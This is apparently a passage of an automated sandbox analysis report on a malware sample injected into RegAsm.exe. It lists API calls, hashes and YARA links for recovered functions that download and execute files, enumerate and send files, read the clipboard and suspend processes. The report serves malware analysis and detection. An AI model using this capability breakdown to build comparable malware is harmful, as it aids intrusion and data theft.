                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1157919129-0
                                                                                                                                  • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                                  • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                                                                  • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                                  • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                                                  Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1771804793-0
                                                                                                                                  • Opcode ID: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                                                                                                  • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                                                                  • Opcode Fuzzy Hash: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                                                                                                  • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                                                                  Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DownloadExecuteFileShell
                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                                                                  • API String ID: 2825088817-3056885514
                                                                                                                                  • Opcode ID: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                                                                                                  • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                                                                  • Opcode Fuzzy Hash: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                                                                                                  • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                                                                  Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$FirstNextsend
                                                                                                                                  • String ID: XPG$XPG
                                                                                                                                  • API String ID: 4113138495-1962359302
                                                                                                                                  • Opcode ID: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                                                                                                                  • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                                                                  • Opcode Fuzzy Hash: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                                                                                                                  • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                                                                  Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                    • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                                    • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                  • API String ID: 4127273184-3576401099
                                                                                                                                  • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                                  • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                                                                  • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                                  • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                                                                  Function 100060E2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 3906539128-2459865102
                                                                                                                                  • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                  • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                  • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                  • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                  Function 10006580 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: .$fYM/
                                                                                                                                  • API String ID: 0-3740560963
                                                                                                                                  • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                  • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                  • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                  • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                  Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                  • String ID: p'E$JD
                                                                                                                                  • API String ID: 1084509184-908320845
                                                                                                                                  • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                                  • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                                                                  • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                                  • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                                                                  Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2829624132-0
                                                                                                                                  • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                                                                  • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                                  • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                                                                  Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                  • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                                  • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                                                                  • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                                  • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                                                                  Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                                                                  Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                  • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                  • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                  • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                  • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                  • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                  Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$CloseDataOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2058664381-0
                                                                                                                                  • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                                                  • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                                                  Function 0041BBC6 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseHandleOpenResume
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3614150671-0
                                                                                                                                  • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                                  • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                                                                                  • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                                  • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                                                                                  Function 0041BB9A Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1999457699-0
                                                                                                                                  • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                  • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                                                                                  • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                  • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                                                                                  Function 00434CB6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                  • String ID: MZ@
                                                                                                                                  • API String ID: 2325560087-2978689999
                                                                                                                                  • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                  • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                                                                  • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                  • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                                                                  Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: .
                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                  • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                                  • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                                                                                  • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                                  • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                                                                                  Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
